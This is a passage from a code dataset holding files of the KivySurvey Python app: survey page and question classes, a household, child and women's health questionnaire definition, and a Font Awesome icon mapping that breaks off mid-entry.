json_data['demographic_restrictions']\n\n\n def load_subject_fields(self, name, survey):\n json_data = survey.survey_file['survey'][name]\n self.subject_fields = json_data['subject_fields']\n\n def load_headers(self, name, survey):\n json_data = survey.survey_file['survey'][name]\n self.headers = json_data['headers']\n\n def load_pages(self, name, survey):\n json_data = survey.survey_file['survey'][name]\n pages_json = json_data['pages']\n pages = self.pages = {}\n self.page_order = json_data['page_order']\n for each in pages_json:\n p = Page(each, name, survey)\n pages[each] = p\n\n\nclass Page(object):\n\n def __init__(self, name, questionnaire_name, survey, **kwargs):\n super(Page, self).__init__(**kwargs)\n self.q_name = questionnaire_name\n self.survey = survey\n self.name = name\n self.question_order = []\n self.load_questions(name, questionnaire_name, survey)\n\n def load_questions(self, name, q_name, survey):\n json_data = survey.survey_file['survey'][q_name]['pages'][name]\n questions_json = json_data['questions']\n questions = self.questions = {}\n self.question_order = json_data['question_order']\n if 'disable_binds' in json_data:\n self.disable_binds = disable_binds = json_data['disable_binds']\n else:\n self.disable_binds = disable_binds = []\n for each in questions_json:\n q = Question(each, questions_json[each])\n questions[each] = q\n for bind in disable_binds:\n a, b = bind\n q1 = questions[a]\n q2 = questions[b]\n wid1 = q1.widget\n wid2 = q2.widget\n wid1.bind(answer=q2.call_disable_bind)\n wid2.bind(answer=q1.call_disable_bind)\n \n\n\nclass Question(object):\n \n def __init__(self, question_name, question_json, **kwargs):\n super(Question, self).__init__(**kwargs)\n self.widget = wid = widget_from_json(question_json)\n wid.question_name = question_name\n\n def call_disable_bind(self, instance, value):\n if instance.validate_question():\n self.widget.disabled = True\n else:\n self.widget.disabled = False\n" }, { "alpha_fraction": 0.5297189354896545, "alphanum_fraction": 0.5355552434921265, "avg_line_length": 25.47154426574707, "blob_id": "dd5750a2a0febeb9b3e0743b7a5dfe5e7edf94f7", "content_id": "ec05b763af6b6a004e4df3a02f7314773bbfba3f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6511, "license_type": "permissive", "max_line_length": 72, "num_lines": 246, "path": "/kivy_survey/surveydata.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "import kivy\nfrom kivy.storage.jsonstore import JsonStore\n\nsurvey = {\n\t\"household_questionnaire\": \n\t\t{\"pages\": {\"household1\": \n\t\t\t{\"questions\": \n\t\t\t\t{\"household_id\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Enter Household ID: \"\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}, \n\t\t\t\"question_order\": [\"household_id\", ]},\n\t\t\t}, \n\t\t\"page_order\": [\"household1\", ],\n\t\t\"headers\": [('Enter Households for Cluster', \n\t\t\t('data', 'cluster', 'current_cluster'))],\n\t\t\"next_questionnaire\": \"add_member\",\n\t\t\"allow_forward\": False,\n\t\t\"add_subjects\": True,\n\t\t\"subject_fields\": ['Household', \n\t\t\t('household_questionnaire', 'household1', 'household_id')]\n\t\t},\n\t\"add_member\":\n\t\t{\"pages\": {\"addmember1\": \n\t\t\t{\"questions\": \n\t\t\t\t{\"name\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionTextInput\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Enter Name: \"\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"age\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Age in completed years: \"\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"gender\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Gender: \",\n\t\t\t\t\t\t\"answer_group\": 'gender',\n\t\t\t\t\t\t\"answer1_text\": 'M',\n\t\t\t\t\t\t'answer2_text': 'F',\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"status\": \n\t\t\t\t\t{\"type\": \"CheckboxQuestion\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Status: \",\n\t\t\t\t\t\t\"group\": 'born_joined',\n\t\t\t\t\t\t\"answers\": ['Born during recall period', \n\t\t\t\t\t\t\t'Joined household during recall period'],\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t}, \n\t\t\t\"question_order\": [\"name\", \"age\", \"gender\", \"status\"]},\n\t\t\t},\n\t\t\"page_order\": [\"addmember1\"],\n\t\t\"add_subjects\": True,\n\t\t\"allow_forward\": True,\n\t\t\"next_questionnaire\": \"child_survey\",\n\t\t\"headers\": [('Add Member for Household', \n\t\t\t('household_questionnaire', 'household1', 'household_id'))],\n\t\t\"subject_fields\": [('add_member', 'addmember1', 'name'), \n\t\t\t('add_member', 'addmember1', 'age'),\n\t\t\t('add_member', 'addmember1', 'gender')]\n\t\t},\n\t\"child_survey\":\n\t\t{\"pages\": {\"child_survey1\": \n\t\t\t{\"questions\": \n\t\t\t\t{\"birthdate\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionBirthDate\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Enter Date of Birth: \"\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"age_in_months\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Age in Months: \",\n\t\t\t\t\t\t\"do_decimal\": False,\n\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"weight\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record Weight: \",\n\t\t\t\t\t\t\"units\": \"kg\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"height\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record Weight: \",\n\t\t\t\t\t\t\"units\": \"cm\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"height_type\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Type of Height Measurement: \",\n\t\t\t\t\t\t\"answer1_text\": 'Child Standing (Height)',\n\t\t\t\t\t\t\"answer2_text\": 'Child Recumbent (Length)',\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"muac\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record MUAC: \",\n\t\t\t\t\t\t\"units\": \"mm\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"edema\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Is Bilateral Edema Present?\",\n\t\t\t\t\t\t\"answer_group\": 'edema_question'\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t}, \n\t\t\t\"question_order\": [\"birthdate\", \"age_in_months\", \"weight\", \"height\", \n\t\t\t\t\"height_type\",\"muac\", \"edema\"],\n\t\t\t\"disable_binds\": [(\"birthdate\", \"age_in_months\")],},\n\t\t\t\"child_survey2\": \n\t\t\t\t{\"questions\":\n\t\t\t\t{\"diarrhoea\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \n\t\t\t\t\t\t\t\"In the last two weeks, has the child had diarrhoea?\",\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t\"question_order\": ['diarrhoea']\n\t\t\t},\n\t\t\t},\n\t\t\"page_order\": [\"child_survey1\", 'child_survey2'],\n\t\t\"add_subjects\": False,\n\t\t\"allow_forward\": True,\n\t\t\"demographic_restrictions\": [('add_member', \n\t\t\t'addmember1', 'age', (0, 6))],\n\t\t\"demographic\": 'add_member',\n\t\t\"next_questionnaire\": \"women_survey\",\n\t\t\"headers\": [('Child Survey for Household', \n\t\t\t('household_questionnaire', 'household1', 'household_id'))],\n\t\t\"subject_fields\": [('add_member', 'addmember1', 'name'), \n\t\t\t('add_member', 'addmember1', 'age'),\n\t\t\t('add_member', 'addmember1', 'gender')]\n\t\t},\n\t\"women_survey\":\n\t\t{\"pages\": {\"women_survey1\": \n\t\t\t{\"questions\": \n\t\t\t\t{\"weight\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record Weight: \",\n\t\t\t\t\t\t\"units\": \"kg\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"height\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record Weight: \",\n\t\t\t\t\t\t\"units\": \"cm\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"muac\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionNumerical\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Record MUAC: \",\n\t\t\t\t\t\t\"units\": \"mm\",\n\t\t\t\t\t\t\"do_decimal\": True,\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"pregnant\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Are you currently pregnant?\",\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t\"answer_group\": 'pregnant_question',\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"breastfeeding\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \"Are you currently breastfeeding?\",\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t\"answer_group\": 'breastfeeding_question',\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t}, \n\t\t\t\"question_order\": [\"weight\", \"height\", \"muac\", \n\t\t\t\"pregnant\", \"breastfeeding\"],},\n\t\t\"women_survey2\": \n\t\t\t{\"questions\":\n\t\t\t\t{\"ever_pregnant\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \n\t\t\t\t\t\t\t\"Have you ever been pregnant?\",\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t\"answer_group\": 'ever_pregnant'\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"ante-natal_care\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \n\t\t\t\t\t\t\t\"When you were pregnant, did you receive any ante-natal care?\",\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t\"answer_group\": 'ante-natal'\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t\"question_order\": ['ever_pregnant', 'ante-natal_care']\n\t\t\t},},\n\t\t\"page_order\": [\"women_survey1\", \"women_survey2\"],\n\t\t\"add_subjects\": False,\n\t\t\"allow_forward\": True,\n\t\t\"demographic_restrictions\": [('add_member', \n\t\t\t'addmember1', 'age', (15, 49)), ('add_member', \n\t\t\t'addmember1', 'gender', 'F')],\n\t\t\"demographic\": 'add_member',\n\t\t\"headers\": [('Women Survey for Household', \n\t\t\t('household_questionnaire', 'household1', 'household_id'))],\n\t\t\"subject_fields\": [('add_member', 'addmember1', 'name'), \n\t\t\t('add_member', 'addmember1', 'age'),\n\t\t\t('add_member', 'addmember1', 'gender')]\n\t\t},\n\t\n}\n\njson = JsonStore('survey.json')\njson['survey'] = survey" }, { "alpha_fraction": 0.5139415860176086, "alphanum_fraction": 0.6013830304145813, "avg_line_length": 25.633663177490234, "blob_id": "b627909688622b2a2c3c1c63a9beac4c8b7b458f", "content_id": "3087be55bc86046f26b33023a78c2c7971a4b455", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13449, "license_type": "permissive", "max_line_length": 37, "num_lines": 505, "path": "/kivy_survey/fa_icon_definitions.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "fa_icons = {\n'fa-glass': u\"\\uf000\",\n'fa-music': u\"\\uf001\",\n'fa-search': u\"\\uf002\",\n'fa-envelope-o': u\"\\uf003\",\n'fa-heart': u\"\\uf004\",\n'fa-star': u\"\\uf005\",\n'fa-star-o': u\"\\uf006\",\n'fa-user': u\"\\uf007\",\n'fa-film': u\"\\uf008\",\n'fa-th-large': u\"\\uf009\",\n'fa-th': u\"\\uf00a\",\n'fa-th-list': u\"\\uf00b\",\n'fa-check': u\"\\uf00c\",\n'fa-times': u\"\\uf00d\",\n'fa-search-plus': u\"\\uf00e\",\n'fa-search-minus': u\"\\uf010\",\n'fa-power-off': u\"\\uf011\",\n'fa-signal': u\"\\uf012\",\n'fa-gear': u\"\\uf013\",\n'fa-cog': u\"\\uf013\",\n'fa-trash-o': u\"\\uf014\",\n'fa-home': u\"\\uf015\",\n'fa-file-o': u\"\\uf016\",\n'fa-clock-o': u\"\\uf017\",\n'fa-road': u\"\\uf018\",\n'fa-download': u\"\\uf019\",\n'fa-arrow-circle-o-down': u\"\\uf01a\",\n'fa-arrow-circle-o-up': u\"\\uf01b\",\n'fa-inbox': u\"\\uf01c\",\n'fa-play-circle-o': u\"\\uf01d\",\n'fa-rotate-right': u\"\\uf01e\",\n'fa-repeat': u\"\\uf01e\",\n'fa-refresh': u\"\\uf021\",\n'fa-list-alt': u\"\\uf022\",\n'fa-lock': u\"\\uf023\",\n'fa-flag': u\"\\uf024\",\n'fa-headphones': u\"\\uf025\",\n'fa-volume-off': u\"\\uf026\",\n'fa-volume-down': u\"\\uf027\",\n'fa-volume-up': u\"\\uf028\",\n'fa-qrcode': u\"\\uf029\",\n'fa-barcode': u\"\\uf02a\",\n'fa-tag': u\"\\uf02b\",\n'fa-tags': u\"\\uf02c\",\n'fa-book': u\"\\uf02d\",\n'fa-bookmark': u\"\\uf02e\",\n'fa-print': u\"\\uf02f\",\n'fa-camera': u\"\\uf030\",\n'fa-font': u\"\\uf031\",\n'fa-bold': u\"\\uf032\",\n'fa-italic': u\"\\uf033\",\n'fa-text-height': u\"\\uf034\",\n'fa-text-width': u\"\\uf035\",\n'fa-align-left': u\"\\uf036\",\n'fa-align-center': u\"\\uf037\",\n'fa-align-right': u\"\\uf038\",\n'fa-align-justify': u\"\\uf039\",\n'fa-list': u\"\\uf03a\",\n'fa-dedent': u\"\\uf03b\",\n'fa-outdent': u\"\\uf03b\",\n'fa-indent': u\"\\uf03c\",\n'fa-video-camera': u\"\\uf03d\",\n'fa-photo': u\"\\uf03e\",\n'fa-image': u\"\\uf03e\",\n'fa-picture-o': u\"\\uf03e\",\n'fa-pencil': u\"\\uf040\",\n'fa-map-marker': u\"\\uf041\",\n'fa-adjust': u\"\\uf042\",\n'fa-tint': u\"\\uf043\",\n'fa-edit': u\"\\uf044\",\n'fa-pencil-square-o': u\"\\uf044\",\n'fa-share-square-o': u\"\\uf045\",\n'fa-check-square-o': u\"\\uf046\",\n'fa-arrows': u\"\\uf047\",\n'fa-step-backward': u\"\\uf048\",\n'fa-fast-backward': u\"\\uf049\",\n'fa-backward': u\"\\uf04a\",\n'fa-play': u\"\\uf04b\",\n'fa-pause': u\"\\uf04c\",\n'fa-stop': u\"\\uf04d\",\n'fa-forward': u\"\\uf04e\",\n'fa-fast-forward': u\"\\uf050\",\n'fa-step-forward': u\"\\uf051\",\n'fa-eject': u\"\\uf052\",\n'fa-chevron-left': u\"\\uf053\",\n'fa-chevron-right': u\"\\uf054\",\n'fa-plus-circle': u\"\\uf055\",\n'fa-minus-circle': u\"\\uf056\",\n'fa-times-circle': u\"\\uf057\",\n'fa-check-circle': u\"\\uf058\",\n'fa-question-circle': u\"\\uf059\",\n'fa-info-circle': u\"\\uf05a\",\n'fa-crosshairs': u\"\\uf05b\",\n'fa-times-circle-o': u\"\\uf05c\",\n'fa-check-circle-o': u\"\\uf05d\",\n'fa-ban': u\"\\uf05e\",\n'fa-arrow-left': u\"\\uf060\",\n'fa-arrow-right': u\"\\uf061\",\n'fa-arrow-up': u\"\\uf062\",\n'fa-arrow-down': u\"\\uf063\",\n'fa-mail-forward': u\"\\uf064\",\n'fa-share': u\"\\uf064\",\n'fa-expand': u\"\\uf065\",\n'fa-compress': u\"\\uf066\",\n'fa-plus': u\"\\uf067\",\n'fa-minus': u\"\\uf068\",\n'fa-asterisk': u\"\\uf069\",\n'fa-exclamation-circle': u\"\\uf06a\",\n'fa-gift': u\"\\uf06b\",\n'fa-leaf': u\"\\uf06c\",\n'fa-fire': u\"\\uf06d\",\n'fa-eye': u\"\\uf06e\",\n'fa-eye-slash': u\"\\uf070\",\n'fa-warning': u\"\\uf071\",\n'fa-exclamation-triangle': u\"\\uf071\",\n'fa-plane': u\"\\uf072\",\n'fa-calendar': u\"\\uf073\",\n'fa-random': u\"\\uf074\",\n'fa-comment': u\"\\uf075\",\n'fa-magnet': u\"\\uf076\",\n'fa-chevron-up': u\"\\uf077\",\n'fa-chevron-down': u\"\\uf078\",\n'fa-retweet': u\"\\uf079\",\n'fa-shopping-cart': u\"\\uf07a\",\n'fa-folder': u\"\\uf07b\",\n'fa-folder-open': u\"\\uf07c\",\n'fa-arrows-v': u\"\\uf07d\",\n'fa-arrows-h': u\"\\uf07e\",\n'fa-bar-chart-o': u\"\\uf080\",\n'fa-twitter-square': u\"\\uf081\",\n'fa-facebook-square': u\"\\uf082\",\n'fa-camera-retro': u\"\\uf083\",\n'fa-key': u\"\\uf084\",\n'fa-gears': u\"\\uf085\",\n'fa-cogs': u\"\\uf085\",\n'fa-comments': u\"\\uf086\",\n'fa-thumbs-o-up': u\"\\uf087\",\n'fa-thumbs-o-down': u\"\\uf088\",\n'fa-star-half': u\"\\uf089\",\n'fa-heart-o': u\"\\uf08a\",\n'fa-sign-out': u\"\\uf08b\",\n'fa-linkedin-square': u\"\\uf08c\",\n'fa-thumb-tack': u\"\\uf08d\",\n'fa-external-link': u\"\\uf08e\",\n'fa-sign-in': u\"\\uf090\",\n'fa-trophy': u\"\\uf091\",\n'fa-github-square': u\"\\uf092\",\n'fa-upload': u\"\\uf093\",\n'fa-lemon-o': u\"\\uf094\",\n'fa-phone': u\"\\uf095\",\n'fa-square-o': u\"\\uf096\",\n'fa-bookmark-o': u\"\\uf097\",\n'fa-phone-square': u\"\\uf098\",\n'fa-twitter': u\"\\uf099\",\n'fa-facebook': u\"\\uf09a\",\n'fa-github': u\"\\uf09b\",\n'fa-unlock': u\"\\uf09c\",\n'fa-credit-card': u\"\\uf09d\",\n'fa-rss': u\"\\uf09e\",\n'fa-hdd-o': u\"\\uf0a0\",\n'fa-bullhorn': u\"\\uf0a1\",\n'fa-bell': u\"\\uf0f3\",\n'fa-certificate': u\"\\uf0a3\",\n'fa-hand-o-right': u\"\\uf0a4\",\n'fa-hand-o-left': u\"\\uf0a5\",\n'fa-hand-o-up': u\"\\uf0a6\",\n'fa-hand-o-down': u\"\\uf0a7\",\n'fa-arrow-circle-left': u\"\\uf0a8\",\n'fa-arrow-circle-right': u\"\\uf0a9\",\n'fa-arrow-circle-up': u\"\\uf0aa\",\n'fa-arrow-circle-down': u\"\\uf0ab\",\n'fa-globe': u\"\\uf0ac\",\n'fa-wrench': u\"\\uf0ad\",\n'fa-tasks': u\"\\uf0ae\",\n'fa-filter': u\"\\uf0b0\",\n'fa-briefcase': u\"\\uf0b1\",\n'fa-arrows-alt': u\"\\uf0b2\",\n'fa-group': u\"\\uf0c0\",\n'fa-users': u\"\\uf0c0\",\n'fa-chain': u\"\\uf0c1\",\n'fa-link': u\"\\uf0c1\",\n'fa-cloud': u\"\\uf0c2\",\n'fa-flask': u\"\\uf0c3\",\n'fa-cut': u\"\\uf0c4\",\n'fa-scissors': u\"\\uf0c4\",\n'fa-copy': u\"\\uf0c5\",\n'fa-files-o': u\"\\uf0c5\",\n'fa-paperclip': u\"\\uf0c6\",\n'fa-save': u\"\\uf0c7\",\n'fa-floppy-o': u\"\\uf0c7\",\n'fa-square': u\"\\uf0c8\",\n'fa-navicon': u\"\\uf0c9\",\n'fa-reorder': u\"\\uf0c9\",\n'fa-bars': u\"\\uf0c9\",\n'fa-list-ul': u\"\\uf0ca\",\n'fa-list-ol': u\"\\uf0cb\",\n'fa-strikethrough': u\"\\uf0cc\",\n'fa-underline': u\"\\uf0cd\",\n'fa-table': u\"\\uf0ce\",\n'fa-magic': u\"\\uf0d0\",\n'fa-truck': u\"\\uf0d1\",\n'fa-pinterest': u\"\\uf0d2\",\n'fa-pinterest-square': u\"\\uf0d3\",\n'fa-google-plus-square': u\"\\uf0d4\",\n'fa-google-plus': u\"\\uf0d5\",\n'fa-money': u\"\\uf0d6\",\n'fa-caret-down': u\"\\uf0d7\",\n'fa-caret-up': u\"\\uf0d8\",\n'fa-caret-left': u\"\\uf0d9\",\n'fa-caret-right': u\"\\uf0da\",\n'fa-columns': u\"\\uf0db\",\n'fa-unsorted': u\"\\uf0dc\",\n'fa-sort': u\"\\uf0dc\",\n'fa-sort-down': u\"\\uf0dd\",\n'fa-sort-desc': u\"\\uf0dd\",\n'fa-sort-up': u\"\\uf0de\",\n'fa-sort-asc': u\"\\uf0de\",\n'fa-envelope': u\"\\uf0e0\",\n'fa-linkedin': u\"\\uf0e1\",\n'fa-rotate-left': u\"\\uf0e2\",\n'fa-undo': u\"\\uf0e2\",\n'fa-legal': u\"\\uf0e3\",\n'fa-gavel': u\"\\uf0e3\",\n'fa-dashboard': u\"\\uf0e4\",\n'fa-tachometer': u\"\\uf0e4\",\n'fa-comment-o': u\"\\uf0e5\",\n'fa-comments-o': u\"\\uf0e6\",\n'fa-flash': u\"\\uf0e7\",\n'fa-bolt': u\"\\uf0e7\",\n'fa-sitemap': u\"\\uf0e8\",\n'fa-umbrella': u\"\\uf0e9\",\n'fa-paste': u\"\\uf0ea\",\n'fa-clipboard': u\"\\uf0ea\",\n'fa-lightbulb-o': u\"\\uf0eb\",\n'fa-exchange': u\"\\uf0ec\",\n'fa-cloud-download': u\"\\uf0ed\",\n'fa-cloud-upload': u\"\\uf0ee\",\n'fa-user-md': u\"\\uf0f0\",\n'fa-stethoscope': u\"\\uf0f1\",\n'fa-suitcase': u\"\\uf0f2\",\n'fa-bell-o': u\"\\uf0a2\",\n'fa-coffee': u\"\\uf0f4\",\n'fa-cutlery': u\"\\uf0f5\",\n'fa-file-text-o': u\"\\uf0f6\",\n'fa-building-o': u\"\\uf0f7\",\n'fa-hospital-o': u\"\\uf0f8\",\n'fa-ambulance': u\"\\uf0f9\",\n'fa-medkit': u\"\\uf0fa\",\n'fa-fighter-jet': u\"\\uf0fb\",\n'fa-beer': u\"\\uf0fc\",\n'fa-h-square': u\"\\uf0fd\",\n'fa-plus-square': u\"\\uf0fe\",\n'fa-angle-double-left': u\"\\uf100\",\n'fa-angle-double-right': u\"\\uf101\",\n'fa-angle-double-up': u\"\\uf102\",\n'fa-angle-double-down': u\"\\uf103\",\n'fa-angle-left': u\"\\uf104\",\n'fa-angle-right': u\"\\uf105\",\n'fa-angle-up': u\"\\uf106\",\n'fa-angle-down': u\"\\uf107\",\n'fa-desktop': u\"\\uf108\",\n'fa-laptop': u\"\\uf109\",\n'fa-tablet': u\"\\uf10a\",\n'fa-mobile-phone': u\"\\uf10b\",\n'fa-mobile': u\"\\uf10b\",\n'fa-circle-o': u\"\\uf10c\",\n'fa-quote-left': u\"\\uf10d\",\n'fa-quote-right': u\"\\uf10e\",\n'fa-spinner': u\"\\uf110\",\n'fa-circle': u\"\\uf111\",\n'fa-mail-reply': u\"\\uf112\",\n'fa-reply': u\"\\uf112\",\n'fa-github-alt': u\"\\uf113\",\n'fa-folder-o': u\"\\uf114\",\n'fa-folder-open-o': u\"\\uf115\",\n'fa-smile-o': u\"\\uf118\",\n'fa-frown-o': u\"\\uf119\",\n'fa-meh-o': u\"\\uf11a\",\n'fa-gamepad': u\"\\uf11b\",\n'fa-keyboard-o': u\"\\uf11c\",\n'fa-flag-o': u\"\\uf11d\",\n'fa-flag-checkered': u\"\\uf11e\",\n'fa-terminal': u\"\\uf120\",\n'fa-code': u\"\\uf121\",\n'fa-mail-reply-all': u\"\\uf122\",\n'fa-reply-all': u\"\\uf122\",\n'fa-star-half-empty': u\"\\uf123\",\n'fa-star-half-full': u\"\\uf123\",\n'fa-star-half-o': u\"\\uf123\",\n'fa-location-arrow': u\"\\uf124\",\n'fa-crop': u\"\\uf125\",\n'fa-code-fork': u\"\\uf126\",\n'fa-unlink': u\"\\uf127\",\n'fa-chain-broken': u\"\\uf127\",\n'fa-question': u\"\\uf128\",\n'fa-info': u\"\\uf129\",\n'fa-exclamation': u\"\\uf12a\",\n'fa-superscript': u\"\\uf12b\",\n'fa-subscript': u\"\\uf12c\",\n'fa-eraser': u\"\\uf12d\",\n'fa-puzzle-piece': u\"\\uf12e\",\n'fa-microphone': u\"\\uf130\",\n'fa-microphone-slash': u\"\\uf131\",\n'fa-shield': u\"\\uf132\",\n'fa-calendar-o': u\"\\uf133\",\n'fa-fire-extinguisher': u\"\\uf134\",\n'fa-rocket': u\"\\uf135\",\n'fa-maxcdn': u\"\\uf136\",\n'fa-chevron-circle-left': u\"\\uf137\",\n'fa-chevron-circle-right': u\"\\uf138\",\n'fa-chevron-circle-up': u\"\\uf139\",\n'fa-chevron-circle-down': u\"\\uf13a\",\n'fa-html5': u\"\\uf13b\",\n'fa-css3': u\"\\uf13c\",\n'fa-anchor': u\"\\uf13d\",\n'fa-unlock-alt': u\"\\uf13e\",\n'fa-bullseye': u\"\\uf140\",\n'fa-ellipsis-h': u\"\\uf141\",\n'fa-ellipsis-v': u\"\\uf142\",\n'fa-rss-square': u\"\\uf143\",\n'fa-play-circle': u\"\\uf144\",\n'fa-ticket': u\"\\uf145\",\n'fa-minus-square': u\"\\uf146\",\n'fa-minus-square-o': u\"\\uf147\",\n'fa-level-up': u\"\\uf148\",\n'fa-level-down': u\"\\uf149\",\n'fa-check-square': u\"\\uf14a\",\n'fa-pencil-square': u\"\\uf14b\",\n'fa-external-link-square': u\"\\uf14c\",\n'fa-share-square': u\"\\uf14d\",\n'fa-compass': u\"\\uf14e\",\n'fa-toggle-down': u\"\\uf150\",\n'fa-caret-square-o-down': u\"\\uf150\",\n'fa-toggle-up': u\"\\uf151\",\n'fa-caret-square-o-up': u\"\\uf151\",\n'fa-toggle-right': u\"\\uf152\",\n'fa-caret-square-o-right': u\"\\uf152\",\n'fa-euro': u\"\\uf153\",\n'fa-eur': u\"\\uf153\",\n'fa-gbp': u\"\\uf154\",\n'fa-dollar': u\"\\uf155\",\n'fa-usd': u\"\\uf155\",\n'fa-rupee': u\"\\uf156\",\n'fa-inr': u\"\\uf156\",\n'fa-cny': u\"\\uf157\",\n'fa-rmb': u\"\\uf157\",\n'fa-yen': u\"\\uf157\",\n'fa-jpy': u\"\\uf157\",\n'fa-ruble': u\"\\uf158\",\n'fa-rouble': u\"\\uf158\",\n'fa-rub': u\"\\uf158\",\n'fa-won': u\"\\uf159\",\n'fa-krw': u\"\\uf159\",\n'fa-bitcoin': u\"\\uf15a\",\n'fa-btc': u\"\\uf15a\",\n'fa-file': u\"\\uf15b\",\n'fa-file-text': u\"\\uf15c\",\n'fa-sort-alpha-asc': u\"\\uf15d\",\n'fa-sort-alpha-desc': u\"\\uf15e\",\n'fa-sort-amount-asc': u\"\\uf160\",\n'fa-sort-amount-desc': u\"\\uf161\",\n'fa-sort-numeric-asc': u\"\\uf162\",\n'fa-sort-numeric-desc': u\"\\uf163\",\n'fa-thumbs-up': u\"\\uf164\",\n'fa-thumbs-down': u\"\\uf165\",\n'fa-youtube-square': u\"\\uf166\",\n'fa-youtube': u\"\\uf167\",\n'fa-xing': u\"\\uf168\",\n'fa-xing-square': u\"\\uf169\",\n'fa-youtube-play': u\"\\uf16a\",\n'fa-dropbox': u\"\\uf16b\",\n'fa-stack-overflow': u\"\\uf16c\",\n'fa-instagram': u\"\\uf16d\",\n'fa-flickr': u\"\\uf16e\",\n'fa-adn': u\"\\uf170\",\n'fa-bitbucket': u\"\\uf171\",\n'fa-bitbucket-square': u\"\\uf172\",\n'fa-tumblr': u\"\\uf173\",\n'fa-tumblr-square': u\"\\uf174\",\n'fa-long-arrow-down': u\"\\uf175\",\n'fa-long-arrow-up': u\"\\uf176\",\n'fa-long-arrow-left': u\"\\uf177\",\n'fa-long-arrow-right': u\"\\uf178\",\n'fa-apple': u\"\\uf179\",\n'fa-windows': u\"\\uf17a\",\n'fa-android': 